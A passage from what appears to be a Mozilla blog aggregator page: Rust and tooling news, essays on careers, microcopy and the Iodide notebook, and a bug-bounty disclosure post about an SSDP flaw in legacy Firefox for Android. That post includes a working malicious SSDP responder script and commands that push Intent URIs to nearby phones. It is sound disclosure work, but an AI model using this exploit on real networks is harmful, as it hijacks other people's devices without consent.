  • Fixed compatibility issues with mercurial >= 5.5.
  • Avoid downloading unsupported clonebundles.
  • Provide more resilience to network problems during bundle download.
  • Prebuilt helper for Apple Silicon macOS now available via git cinnabar download.

Karl DubostCareer Opportunities mean a lot of things

When being asked

I believe there are good career opportunities for me at Company X

what do you understand? Some people will associate this directly with climbing the company's hierarchy ladder. I have the feeling the reality is a lot more diverse: "career opportunities" means different things to different people.

So I asked around (friends, family, colleagues) what their take on it was, beyond climbing higher in the hierarchy.

  • change of titles (role recognition).

    This doesn't necessarily imply climbing the hierarchy ladder; it can just mean you are recognized for a certain expertise.

  • change of salary/work status (money/time).

    Sometimes, people don't want to change their status but want better compensation, or a better working schedule (e.g. working 4 days a week for the same salary).

  • change of responsibilities (practical work being done in the team)

    Some will see this as a possibility to learn new tricks, to diversify the work they do on a daily basis.

  • change of team (working on different things inside the company)

    Working on a different team because you think they do something super interesting there is appealing.

  • being mentored (inside your own company)

    It's a bit similar to the two previous ones, but here there's a framework inside the company where, instead of bringing your skills to a project, you partially join another team to learn how that team works. Think of it as a kind of internal internship.

  • change of region/country

    Working in a different country, or in a different region of the same country, when it's your own choice. This flexibility is a gem for me. I did it a couple of times. When working at W3C, I moved from the office on the French Riviera to working from home in Montreal (Canada). A bit later, I moved from Montreal to the W3C office in Japan. At Mozilla too (after moving back to Montreal for a couple of years), I moved from Montreal to Japan again. These are career opportunities because they allow you to work in a different setting with different people and communities, and this in itself makes life a lot richer.

  • Having dedicated/planned time for Conference or Courses

    Being able to follow a class on a topic that helps the individual grow is super useful. But for this to be successful, it has to be understood that it requires time: time to follow the courses, and time to do the coursework.

I'm pretty sure there are other possibilities. Thanks to everyone who shared their thoughts.

Otsukare!

Firefox UXHow to Write Microcopy That Improves the User Experience

Photo of typesetting letters of various shapes and sizes.

Photo by Amador Loureiro on Unsplash.

The small bits of copy you see sprinkled throughout apps and websites are called microcopy. As content designers, we think deeply about what each word communicates.

Microcopy is the tidiest of UI copy types. But do not let its crisp, contained presentation fool you: the process to get to those final, perfect words can be messy. Very messy. Multiple drafts messy, mired with business and technical constraints.

Here’s a secret about good writing that no one ever tells you: When you encounter clear UX content, it’s a result of editing and revision. The person who wrote those words likely had a dozen or more versions you’ll never see. They also probably had some business or technical constraints to consider, too.

If you’ve ever wondered what all goes into writing microcopy, pour yourself a micro-cup of espresso or a micro-brew and read on!

Quotation attributed to Blaise Pascal that reads: I would have written a shorter letter, but I did not have the time.

Blaise Pascal, translated from Lettres Provinciales

1. Understand the component and how it behaves.

As a content designer, you should try to consider as many cases as possible up front. Work with Design and Engineering to test the limits of the container you’re writing for. What will copy look like when it’s really short? What will it look like when it’s really long? You might be surprised what you discover.

Images of two Firefox iOS widgets: Quick Actions and Top Sites.

Before writing the microcopy for iOS widgets, I needed first to understand the component and how it worked.

Apple recently introduced a new component to the iOS ecosystem. You can now add widgets to the Home Screen on your iPhone, iPad, or iPod touch. The Firefox widgets allow you to start a search, close your tabs, or open one of your top sites.

Before I sat down to write a single word of microcopy, I would need to know the following:

  • Is there a character limit for the widget descriptions?
  • What happens if the copy expands beyond that character limit? Does it truncate?
  • We had three widget sizes. Would this impact the available space for microcopy?

Because these widgets didn’t yet exist in the wild for me to interact with, I asked Engineering to help answer my questions. Engineering played with variations of character length in a testing environment to see how the UI might change.

Image of two iOS testing widgets side-by-side, one with a long description and one with a short description.

Engineering tried variations of copy length in a testing environment. This helped us understand surprising behavior in the template itself.

We learned the template behaved in a peculiar way. The widget would shrink to accommodate a longer description. Then, the template would essentially lock to that size. Even if other widgets had shorter descriptions, the widgets themselves would appear teeny. You had to strain your eyes to read any text on the widget itself. Long story short, the descriptions needed to be as concise as possible. This would accommodate for localization and keep the widgets from shrinking.

First learning how the widgets behaved was a crucial step to writing effective microcopy. Build relationships with cross-functional peers so you can ask those questions and understand the limitations of the component you need to write for.

2. Spit out your first draft. Then revise, revise, revise.

Image of a Mark Twain quote: https://www.goodreads.com/quotes/4957-the-difference-between-the-almost-right-word-and-the-right

Mark Twain, The Wit and Wisdom of Mark Twain

Now that I understood my constraints, I was ready to start typing. I typically work through several versions in a Google Doc, wearing out my delete key as I keep reworking until I get it ‘right.’

Image of a table outlining iterations of microcopy written and an assessment of each one.

I wrote several iterations of the description for this widget to maximize the limited space and make the microcopy as useful as possible.

Microcopy strives to provide maximum clarity in a limited amount of space. Every word counts and has to work hard. It’s worth the effort to analyze each word and ask yourself if it’s serving you as well as it could. Consider tense, voice, and other words on the screen.

3. Solicit feedback on your work.

Before delivering final strings to Engineering, it’s always a good practice to get a second set of eyes from a fellow team member (this could be a content designer, UX designer, or researcher). Someone less familiar with the problem space can help spot confusing language or superfluous words.

In many cases, our team also runs copy by our localization team to understand if the language might be too US-centric. Sometimes we will add a note for our localizers to explain the context and intent of the message. We also do a legal review with in-house product counsel. These extra checks give us better confidence in the microcopy we ultimately ship.

Wrapping up

Magical microcopy doesn’t shoot from our fingertips as we type (though we wish it did)! If we have any trade secrets to share, it’s only that first we seek to understand our constraints, then we revise, tweak, and rethink our words many times over. Ideally we bring in a partner to help us refine further and catch blind spots. This is why writing short can take time.

If you’re tasked with writing microcopy, first learn as much as you can about the component you are writing for, particularly its constraints. When you finally sit down to write, don’t worry about getting it right the first time. Get your thoughts on paper, reflect on what you can improve, then repeat. You’ll get crisper and cleaner with each draft.

Acknowledgements

Thank you to my editors Meridel Walkington and Sharon Bautista for your excellent notes and suggestions on this post. Thanks to Emanuela Damiani for the Figma help.

This post was originally published on Medium.

This Week In RustThis Week in Rust 364

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Newsletters
Tooling
Observations/Thoughts
Rust Walkthroughs
Project Updates
Miscellaneous

Crate of the Week

This week's crate is postfix-macros, a clever hack to allow postfix macros in stable Rust.

Thanks to Willi Kappler for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

333 pull requests were merged in the last week

Rust Compiler Performance Triage

  • 2020-11-10: 1 Regression, 2 Improvements, 2 mixed

A mixed week with improvements still outweighing regressions. Perhaps the biggest highlight was the move to compiling rustc crates with the initial-exec TLS model, which results in fewer calls to _tls_get_addr and thus faster compile times.

See the full report for more.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in the final comment period.

Tracking Issues & PRs

New RFCs

Upcoming Events

Online

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

There are no bad programmers, only insufficiently advanced compilers

Esteban Kuber on twitter

Thanks to Nixon Enraght-Moony for the suggestion.

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

William Lachanceiodide retrospective

A bit belatedly, I thought I’d write a short retrospective on Iodide: an effort to create a compelling, client-centred scientific notebook environment.

Despite not writing a ton about it (the sole exception being this brief essay about my conservative choice for the server backend), Iodide took up a very large chunk of my mental energy from late 2018 through 2019. It was also essentially my only attempt at working on something that was on its way to being an actual product while at Mozilla: while I’ve led other projects that have been interesting and/or impactful in my nine-odd years here (mozregression and perfherder being the biggest successes), they fall firmly into the “internal tools supporting another product” category.

At this point it’s probably safe to say that the project has wound down: no one is being paid to work on Iodide and it’s essentially in extreme maintenance mode. Before it’s put to bed altogether, I’d like to write a few notes about its approach, where I think it had big advantages, and where it seems to fall short. I’ll conclude with some areas I’d like to explore (or would like to see others explore!). I’d like to emphasize that this is my opinion only: the rest of the Iodide core team no doubt have their own thoughts. That said, let’s jump in.

What is Iodide, anyway?

One thing that’s interesting about a product like Iodide is that people tend to project their hopes and dreams onto it: if you asked any given member of the Iodide team to give a 200 word description of the project, you’d probably get a slightly different answer emphasizing different things. That said, a fair initial approximation of the project vision would be “a scientific notebook like Jupyter, but running in the browser”.

What does this mean? First, let’s talk about what Jupyter does: at heart, it’s basically a Python “kernel” (read: interpreter), fronted by a webserver. You send snippets of code to the interpreter via a web interface and they are faithfully run on the backend (either on your local machine in a separate process or on a server in the cloud). Results are then returned to the web interface and rendered by the browser in one form or another.

Iodide’s model is quite similar, with one difference: instead of running the kernel in another process or somewhere in the cloud, all the heavy lifting happens in the browser itself, using the local JavaScript and/or WebAssembly runtime. The very first version of the product that Hamilton Ulmer and Brendan Colloran came up with was definitely in this category: it had no server-side component whatsoever.

Truth be told, even applications like Jupyter do a fair amount of computation on the client side to render a user interface and the results of computations: the distinction is not as clear cut as you might think. But in general I think the premise holds: if you load an iodide notebook today (still possible on alpha.iodide.io! no account required), the only thing that comes from the server is a little bit of static JavaScript and a flat file delivered as a JSON payload. All the “magic” of whatever computation you might come up with happens on the client.

Let’s take a quick look at the default tryit iodide notebook to give an idea of what I mean:

%% fetch
// load a js library and a csv file with a fetch cell
js: https://cdnjs.cloudflare.com/ajax/libs/d3/4.10.2/d3.js
text: csvDataString = https://data.sfgov.org/api/views/5cei-gny5/rows.csv?accessType=DOWNLOAD

%% js
// parse the data using the d3 library (and show the value in the console)
parsedData = d3.csvParse(csvDataString)

%% js
// replace the text in the report element "htmlInMd"
document.getElementById('htmlInMd').innerText = parsedData[0].Address

%% py
# use python to select some of the data
from js import parsedData
[x['Address'] for x in parsedData if x['Lead Remediation'] == 'true']

The %% delimiters indicate individual cells. The fetch cell is an iodide-native cell with its own logic to load the specified resources into JavaScript variables when evaluated. js and py cells direct the browser to interpret the code inside of them, which causes the DOM to mutate. From these building blocks (and a few others), you can build up an interactive report which can also be freely forked and edited by anyone who cares to.

In some ways, I think Iodide has more in common with services like Glitch or Codepen than with Jupyter. In effect, it’s mostly offering a way to build up a static web page (doing whatever) using web technologies— even if the user interface affordances and cell-based computation model might remind you more of a scientific notebook.

What works well about this approach

There’s a few nifty things that come from doing things this way:

  • The environment is easily extensible for those familiar with JavaScript or other client side technologies. There is no need to mess with strange plugin architectures or APIs or conform to the opinions of someone else on what options there are for data visualization and presentation. If you want to use jQuery inside your notebook for a user interface widget, just import it and go!
  • The architecture scales to many, many users: since all the computation happens on the client, the server’s only role is to store and retrieve notebook content. alpha.iodide.io has happily been running on Heroku’s least expensive dyno type for its entire existence.
  • Reproducibility: so long as the iodide notebook has no references to data on third party servers with authentication, there is nothing stopping someone from reproducing whatever computations led to your results.
  • Related to reproducibility, it’s easy to build off of someone else’s notebook or exploration, since everything is so self-contained.

I continue to be surprised and impressed with what people come up with in the Jupyter ecosystem so I don’t want to claim these are things that “only Iodide” (or other tools like it) can do— what I will say is that I haven’t seen many things that combine both the conciseness and expressiveness of iomd. The beauty of the web is that there is such an abundance of tutorials and resources to support creating interactive content: when building iodide notebooks, I would freely borrow from resources such as MDN and Stackoverflow, instead of being locked into what the authoring software thinks one should be able to express.

What’s awkward

Every silver lining has a cloud and (unfortunately) Iodide has a pretty big one. Depending on how you use Iodide, you will almost certainly run into the following problems:

  • You are limited by the computational affordances provided by the browser: there is no obvious way to offload long-running or expensive computations to a cluster of machines using a technology like Spark.
  • Long-running computations will block the main thread, causing your notebook to become extremely unresponsive for the duration.

The first, I (and most people?) can usually live with. Computers are quite powerful these days and most data tasks I’m interested in are easily within the range of capabilities of my laptop. In the cases where I need to do something larger scale, I’m quite happy to fire up a Jupyter Notebook, BigQuery Console, or <other tool of choice> to do the heavy-lifting, and then move back to a client-side approach to visualize and explore my results.

The second is much harder to deal with, since it disrupts the process of exploration that is so key to scientific computing. I’m quite happy to wait 5 seconds, 15 seconds, even a minute for a longer-running computation to complete, but if I see the slow script dialog and everything about my environment grinds to a halt, it not only blocks my work but causes me to lose faith in the system. How do I know if it’s even going to finish?

This occurs way more often than you might think: even a simple notebook loading pandas (via pyodide) can cause Firefox to pop up the slow script dialog:

Why is this so? Aren’t browsers complex beasts which can do a million things in parallel these days? Only sort of: while the graphical and network portions of loading and using a web site are highly parallel, JavaScript and any changes to the DOM can only occur synchronously by default. Let’s break down a simple iodide example which trivially hangs the browser:

%% js

while (1) { true }

link (but you really don’t want to)

What’s going on here? When you execute that cell, the web site’s sole thread is now devoted to running that infinite loop. No other JavaScript-based event handler can run, so for example the text editor (which uses Monaco under the hood) and menus are now completely unresponsive.
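
The same is true of Python cells: since pyodide also runs on the main thread, an equivalent py cell (my own illustration here, not one taken from the tryit notebook) locks up the page just as thoroughly:

%% py
# pyodide executes this on the main thread too, so the page hangs
# exactly like the js example above
while True:
    pass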

The iodide team was aware of this issue from the time I joined the project. There was no end of discussions about how to work around it, but they never really came to a satisfying conclusion. The most obvious solution is to move the cell’s computation to a web worker, but workers don’t have synchronous access to the DOM, which is required for web content to work as you’d expect. While there are projects like Comlink that attempt to bridge this divide, they require both a fair amount of skill and code to use effectively. As mentioned above, one of the key differentiators between iodide and other notebook environments is that tools like jQuery, d3, etc. “just work”. That is, you can take a code snippet off the web and run it inside an iodide notebook: there’s no workaround I’ve been able to find which maintains that behaviour and ensures that the Iodide notebook environment is always responsive.

It took a while for this to really hit home, but having some separation from the project, I’ve come to realize that the problem is that the underlying technology isn’t designed for the task we were asking of it, nor is it likely to ever be in the near future. While the web (by which I mean not only the browser, but the ecosystem of popular tooling and libraries that has been built on top of it) has certainly grown in scope to things it was never envisioned to handle like games and office applications, it’s just not optimized for what I’d call “editable content”. That is, the situation where a web page offers affordances for manipulating its own representation.

While modern web browsers have evolved to (sort of) protect one errant site from bringing the whole thing down, they certainly haven’t evolved to protect a particular site against itself. And why would they? Web developers usually work in the terminal and text editor: the assumption is that if their test code misbehaves, they’ll just kill their tab and start all over again. Application state is persisted either on-disk or inside an external database, so nothing will really be lost.

Could this ever change? Possibly, but I think it would be a radical rethinking of what the web is, and I’m not really sure what would motivate it.

A way forward

While working on iodide, we were fond of looking at this diagram, which was taken from this study of the data science workflow:

It describes how people typically perform computational inquiry: you poke around with some raw data and run some transformations on it. Only after that process is complete do you start trying to build up a “presentation” of your results to your audience.

Looking back, it’s clear that Iodide’s strong suit was the explanation part of this workflow, rather than collaboration and exploration. My strong suspicion is that we actually want to use different tools for each one of these tasks. Coincidentally, this also maps to the bulk of my experience working with data at Mozilla, using iodide or not: my most successful front-end data visualization projects were typically the distilled result of a very large number of ad hoc explorations (python scripts, SQL queries, Jupyter notebooks, …). The actual visualization itself contains very little computational meat: basically “just enough” to let the user engage with the data fruitfully.

Unfortunately much of my work in this area uses semi-sensitive internal Mozilla data so can’t be publicly shared, but here’s one example:

link

I built this dashboard in a single day to track our progress (resolved/open bugs) when we were migrating our data platform from AWS to GCP. It was useful: it let us quickly visualize which areas needed more attention and gave upper management more confidence that we were moving closer to our goal. However, there was little computation going on in the client: most of the backend work was happening in our Bugzilla instance; the iodide notebook just did a little bit of post-processing to visualize the results in a useful way.

Along these lines, I still think there is a place in the world for an interactive visualization environment built on principles similar to iodide: basically a markdown editor augmented with primitives oriented around data exploration (for example, charts and data tables), with allowances to bring in any JavaScript library you might want. However, any in-depth data processing would be assumed to have mostly been run elsewhere, in advance. The editing environment could either be the browser or a code editor running on your local machine, per user preference: in either case, there would not be any really important computational state running in the browser, so things like dynamic reloading (or just closing an errant tab) should not cause the user to lose any work.

This would give you the best of both worlds: you could easily create compelling visualizations that are easy to share and remix at minimal cost (because all the work happens in the browser), but you could also use whatever existing tools work best for your initial data exploration (whether that be JavaScript or the more traditional Python data science stack). And because the new tool has a reduced scope, I think building such an environment would be a much more tractable project for an individual or small group to pursue.

More on this in the future, I hope.

Many thanks to Teon Brooks and Devin Bayly for reviewing an early draft of this post

Mozilla Attack & DefenseFirefox for Android: LAN-Based Intent Triggering


This blog post is a guest blog post. We invite participants of our bug bounty program to write about bugs they’ve reported to us.

Background

From its inception, Firefox for Desktop used a single process for all browsing tabs. Since Firefox Quantum, released in 2017, Firefox has been able to spin off multiple “content processes”. This revised architecture allowed for advances in security and performance due to sandboxing and parallelism. Unfortunately, Firefox for Android (code-named “Fennec”) could not instantly be built upon this new technology. A legacy architecture with a completely different user interface required Fennec to remain single-process. But in the fall of 2020, a Fenix rose: the latest version of Firefox for Android is supported by Android Components, a collection of independent libraries for building browsers and browser-like apps that bring the latest rendering technologies to the Android ecosystem.

For this rewrite to succeed, most work on the legacy Android product (“Fennec”) was paused and the browser was put into maintenance mode, receiving fixes only for high-severity security vulnerabilities.

It was during this time, coinciding with the general availability of the new Firefox for Android, that Chris Moberly from GitLab’s Security Red Team reported the following security bug in the almost-legacy browser.

Overview

Back in August, I found a nifty little bug in the Simple Service Discovery Protocol (SSDP) engine of Firefox for Android 68.11.0 and below. Basically, a malicious SSDP server could send Android Intent URIs to anyone on a local wireless network, forcing their Firefox app to launch activities without any user interaction. It was sort of like a magical ability to click links on other peoples’ phones without them knowing.

I disclosed this directly to Mozilla as part of their bug bounty program – you can read the original submission here.

I discovered the bug around the same time Mozilla was already switching over to a completely rebuilt version of Firefox that did not contain the vulnerability. The vulnerable version remained in the Google Play store only for a couple weeks after my initial private disclosure. As you can read in the Bugzilla issue linked above, the team at Mozilla did a thorough review to confirm that the vulnerability was not hiding somewhere in the new version and took steps to ensure that it would never be re-introduced.

Disclosing bugs can be a tricky process with some companies, but the Mozilla folks were an absolute pleasure to work with. I highly recommend checking out their bug bounty program and seeing what you can find!

I did a short technical write-up that is available in the exploit repository. I’ll include those technical details here too, but I’ll also take this opportunity to talk a bit more candidly about how I came across this particular bug and what I did when I found it.


Bug Hunting

I’m lucky enough to be paid to hack things at GitLab, but after a long hard day of hacking for work I like to kick back and unwind by… hacking other things! I’d recently come to the devastating conclusion that a bug I had been chasing for the past two years either didn’t exist or was simply beyond my reach, at least for now. I’d learned a lot along the way, but it was time to focus on something new.

A friend of mine had been doing some cool things with Android, and it sparked my interest. I ordered a paperback copy of “The Android Hacker’s Handbook” and started reading. When learning new things, I often order the big fat physical book and read it in chunks away from my computer screen. Everyone learns differently of course, but there is something about this method that helps break the routine for me.

Anyway, I’m reading through this book and taking notes on areas that I might want to explore. I spend a lot of time hacking in Linux, and Android is basically Linux with an abstraction layer. I’m hoping I can find something familiar and then tweak some of my old techniques to work in the mobile world.

I get to Chapter 2, where it introduces the concept of Android “Intents” and describes them as follows:

“These are message objects that contain information about an operation to be performed… Nearly all common actions – such as tapping a link in a mail message to launch the browser, notifying the messaging app that an SMS has arrived, and installing and removing applications – involve Intents being passed around the system.”

This really piqued my interest, as I’ve spent quite a lot of time looking into how applications pass messages to each other under Linux using things like Unix domain sockets and D-Bus. This sounded similar. I put the book down for a bit and did some more research online.

The Android developer documentation provides a great overview on Intents. Basically, developers can expose application functionality via an Intent. Then they create something called an “Intent filter” which is the application’s way of telling Android what types of message objects it is willing to receive.

For example, an application could offer to send an SMS to one of your contacts. Instead of including all of the code required actually to send an SMS, it could craft an Intent that included things like the recipient phone number and a message body and then send it off to the default messaging application to handle the tricky bits.

Something I found very interesting is that while Intents are often built in code via a complex function, they can also be expressed as URIs, or links. In the case of our text message example above, the Intent URI to send an SMS could look something like this:

sms://8675309?body=”hey%20there!”

In fact, if you click on that link while reading this on an Android phone, it should pop open your default SMS application with the phone number and message filled in. You just triggered an Intent.

Preview of draft SMS

It was at this point that I had my “Hmmm, I wonder what would happen if I…” moment. I don’t know how it is for everyone else, but that phrase pretty much sums up hacking for me.

You see, I’ve had a bit of success in forcing desktop applications to visit URIs and have used this in the past to find exploitable bugs in targets like Plex, Vuze, and even Microsoft Windows.

These previous bugs abused functionality in something called Simple Service Discovery Protocol (SSDP), which is used to advertise and discover services on a local network. In SSDP, an initiator will send a broadcast out over the local network asking for details on any available services, like a second-screen device or a networked speaker. Any system can respond back with details on the location of an XML file that describes their particular service. Then, the initiator will automatically go to that location to parse the XML to better understand the service offering.

And guess what that XML file location looks like…

… That’s right, a URI!

In my previous research on SSDP vulnerabilities, I had spent a lot of time running Wireshark on my home network. One of the things I had noticed was that my Android phone would send out SSDP discovery messages when using the Firefox mobile application. I tried attacking it with all of the techniques I could think of at that time, but I never observed any odd behavior.

But that was before I knew about Intents!

So, what would happen if we created a malicious SSDP server that advertised a service’s location as an Android Intent URI? Let’s find out!

What happened…

First, let’s take a look at what I observed over the network prior to putting this all together. While running Wireshark on my laptop, I noticed repeated UDP packets originating from my Android phone when running Firefox. They were being sent to port 1900 of the UDP multicast address 239.255.255.250. This meant that any device on the local network could see these packets and respond if they chose to.

The packets looked like this:

M-SEARCH * HTTP/1.1
HOST: 239.255.255.250:1900
MAN: "ssdp:discover"
MX: 2
ST: roku:ecp

This is Firefox asking if there are any Roku devices on the network. It would actually ask for other device types as well, but the device type itself isn’t really relevant for this bug.

It looks like an HTTP request, right? It is… sort of. SSDP uses two forms of HTTP over UDP:

  • HTTPMU: HTTP over multi-cast UDP. Meaning the request is broadcast to the entire network over UDP. This is used for clients discovering devices and servers announcing devices.
  • HTTPU: HTTP over uni-cast UDP. Meaning the request is sent from one host directly to another over UDP. This is used for responding to search requests.

If we had a Roku on the network, it would immediately respond with a UDP uni-cast packet that looks something like this:

HTTP/1.1 200 OK
CACHE-CONTROL: max-age=1800
DATE: Tue, 16 Oct 2018 20:17:12 GMT
EXT:
LOCATION: http://192.168.1.100/device-desc.xml
OPT: "http://schemas.upnp.org/upnp/1/0/"; ns=01
01-NLS: uuid:7f7cc7e1-b631-86f0-ebb2-3f4504b58f5c
SERVER: UPnP/1.0
ST: roku:ecp
USN: uuid:7f7cc7e1-b631-86f0-ebb2-3f4504b58f5c::roku:ecp
BOOTID.UPNP.ORG: 0
CONFIGID.UPNP.ORG: 1

Then, Firefox would query that URI in the LOCATION header (http://192.168.1.100/device-desc.xml), expecting to find an XML document that told it all about the Roku and how to interact with it.
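
As a rough sketch of that exchange (a simplified illustration, not part of the original research tooling), a few lines of Python are enough to send the same kind of M-SEARCH over multicast UDP and print whatever unicast replies come back, LOCATION headers and all:

import socket

MCAST_ADDR = ("239.255.255.250", 1900)
MSEARCH = (
    "M-SEARCH * HTTP/1.1\r\n"
    "HOST: 239.255.255.250:1900\r\n"
    'MAN: "ssdp:discover"\r\n'
    "MX: 2\r\n"
    "ST: roku:ecp\r\n"
    "\r\n"
)

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.settimeout(3)
# HTTPMU: the search request goes out to the whole local network via multicast.
sock.sendto(MSEARCH.encode("ascii"), MCAST_ADDR)

# HTTPU: each responder answers with a uni-cast UDP packet sent straight back to us.
try:
    while True:
        data, addr = sock.recvfrom(4096)
        print(f"Reply from {addr[0]}:")
        print(data.decode("ascii", errors="replace"))
except socket.timeout:
    pass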

This is where the experimenting started. What if, instead of http://192.168.1.100/device-desc.xml, I responded back with an Android Intent URI?

I grabbed my old SSDP research tool evil-ssdp, made some quick modifications, and replied with a packet like this:

HTTP/1.1 200 OK
CACHE-CONTROL: max-age=1800
DATE: Tue, 16 Oct 2018 20:17:12 GMT
EXT:
LOCATION: tel://666
OPT: "http://schemas.upnp.org/upnp/1/0/"; ns=01
01-NLS: uuid:7f7cc7e1-b631-86f0-ebb2-3f4504b58f5c
SERVER: UPnP/1.0
ST: upnp:rootdevice
USN: uuid:7f7cc7e1-b631-86f0-ebb2-3f4504b58f5c::roku:ecp
BOOTID.UPNP.ORG: 0
CONFIGID.UPNP.ORG: 1

Notice in the LOCATION header above we are now using the URI tel://666, which uses the URI scheme for Android’s default Phone Intent.

Guess what happened? The dialer on the Android device magically popped open, all on its own, with absolutely no interaction on the mobile device itself. It worked!

 

SSDP Flow

 

PoC

I was pretty excited at this point, but I needed to do some sanity checks and make sure that this could be reproduced reliably.

I toyed around with a couple different Android devices I had, including the official emulator. The behavior was consistent. Any device on the network running Firefox would repeatedly trigger whatever Intent I sent via the LOCATION header as long as the PoC script was running.

This was great, but for a good PoC we need to show some real impact. Popping the dialer may look like a big scary Remote Code Execution bug, but in this case it wasn’t. I needed to do better.

The first step was to write an exploit that was specifically designed for this bug and that provided the flexibility to dynamically provide an Intent at runtime. You can take a look at what I ended up with in this Python script.

The TL;DR of the exploit code is that it will listen on the network for SSDP “discovery” messages and respond back to them, pretending to be exactly the type of device they are looking for. Instead of providing a link to an XML file in the LOCATION header, I would pass in a user-supplied argument, which can be an Android Intent. There are some specifics here that matter and have to be formatted exactly right in order for the initiator to trust them. Luckily, I’d spent some quality time reading the IETF specs to figure that out in the past.
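
Stripped of those formatting details, the core of the responder boils down to something like the following simplified sketch (my illustration of the idea, not the actual ffssdp.py): bind to UDP port 1900, join the multicast group, watch for M-SEARCH packets, and answer each one with a response whose LOCATION header carries a caller-supplied URI.

import socket
import struct
import sys

MCAST_GRP, SSDP_PORT = "239.255.255.250", 1900
location = sys.argv[1]  # e.g. "tel://666" or an intent:// URI

RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "CACHE-CONTROL: max-age=1800\r\n"
    "EXT:\r\n"
    f"LOCATION: {location}\r\n"
    "SERVER: UPnP/1.0\r\n"
    "ST: roku:ecp\r\n"
    "USN: uuid:00000000-0000-0000-0000-000000000000::roku:ecp\r\n"
    "\r\n"
)

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("", SSDP_PORT))
# Join the multicast group so the discovery broadcasts reach this socket.
mreq = struct.pack("4sl", socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)

while True:
    data, addr = sock.recvfrom(4096)
    if data.startswith(b"M-SEARCH"):
        # Answer with uni-cast UDP straight back to the searching device.
        sock.sendto(RESPONSE.encode("ascii"), addr)

Needless to say, only point something like this at devices and networks you own.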

The next step was to find an Intent that would be meaningful in a demonstration of web browser exploitation. Targeting the browser itself seemed like a likely candidate. However, the developer docs were not very helpful here – the URI scheme to open a web browser is defined as http or https. However, the native SSDP code in Firefox mobile would handle those URLs on its own and not pass them off to the Intent system.

A bit of searching around and I learned that there was another way to build an Intent URI while specifying the actual app you would like to send it to. Here’s an example of an Intent URI to specifically launch Firefox and browse to example.com:

intent://example.com/#Intent;scheme=http;package=org.mozilla.firefox;end

If you’d like to try out the exploit yourself, you can grab an older version of Firefox for Android here.

To start, simply join an Android device running a vulnerable version of Firefox to a wireless network and make sure Firefox is running.

Then, on a device that is joined to the same wireless network, run the following command:

# Replace "wlan0" with the wireless device on your attacking machine.
python3 ./ffssdp.py wlan0 -t "intent://example.com/#Intent;scheme=http;package=org.mozilla.firefox;end"

All Android devices on the network running Firefox will automatically browse to example.com.

If you’d like to see an example of using the exploit to launch another application, you can try something like the following, which will open the mail client with a pre-filled message:

# Replace "wlan0" with the wireless device on your attacking machine.
python3 ./ffssdp.py wlan0 -t "mailto:itpeeps@work.com?subject=I've%20been%20hacked&body=OH%20NOES!!!"

These of course are harmless examples to demonstrate the exploit. A bad actor could send a victim to a malicious website, or directly to the location of a malicious browser extension and repeatedly prompt the user to install it.

It is possible that a higher impact exploit could be developed by looking deeper into the Intents offered inside Firefox or to target known-vulnerable Intents in other applications.

When disclosing vulnerabilities, I often feel a sense of urgency once I’ve found something new. I want to get it reported as quickly as possible, but I also try to make sure I’ve built a PoC that is meaningful enough to be taken seriously. I’m sure I don’t always get this balance right, but in this case I felt like I had enough to provide a solid report to Mozilla.

What came next

I worked out a public disclosure date with Mozilla, waited until that day, and then uploaded the exploit code with a short technical write-up and posted a link on Twitter.

To be perfectly honest, I thought the story would end there. I assumed I would get a few thumbs-up emojis from friends and it would then quickly fade away. Or worse, someone would call me out as a fraud and point out that I was completely wrong about the entire thing.

But, guess what? It caught on a bit. Apparently people are really into web browser bugs AND mobile bugs. I think it probably resonates because it is so close to home, affecting that little brick that we all carry in our pockets and share every intimate detail of our life with.

I have a Google “search alert” for my name, and it started pinging me a couple times a day with mentions in online tech articles all around the world, and I even heard from some old friends who came across my name in their news feeds. Pretty cool!

While I’ll be the first to admit that this isn’t some super-sophisticated, earth-shattering discovery, it did garner me a small bit of positive attention and in my line of work that’s pretty handy. I think this is one of the major benefits of disclosing bugs in open-source software to organizations that care – the experience is transparent and can be shared with the world.

 

Another POC video created by @LukasStefanko

 

Lessons learned

This was the first significant discovery I’ve made both in a mobile application and in a web browser, and I certainly wouldn’t consider myself an expert in either. But here I am, writing a guest blog with Mozilla. Who’d have thought? I guess the lesson here is to try new things. Try old things in new ways. Try normal things in weird ways. Basically, just try things.

Hacking, for me at least, is more of an exploration than a well-planned journey. I often chase after random things that look interesting, trying to understand exactly what is happening and why it is happening that way. Sometimes it pays off right away, but more often than not it’s an iterative process that provides benefits at unexpected times. This bug was a great example, where my past experience with SSDP came back to pay dividends with my new research into Android.

Also, read books! And while the book I mention above just happens to be about hacking, I honestly find just as much (maybe more) inspiration consuming information about how to design and build systems. Things are much easier to take apart if you understand how they are put together.

Finally, don’t avoid looking for bugs in major applications just because you may not be the globally renowned expert in that particular area. If I did that, I would never find any at all. The bugs are there, you just have to have curiosity and persistence.

If you read this far, thanks! I realize I went off on some personal tangents, but hopefully the experience will resonate with other hackers on their own explorations.

With that, back to you Freddy.

Conclusion

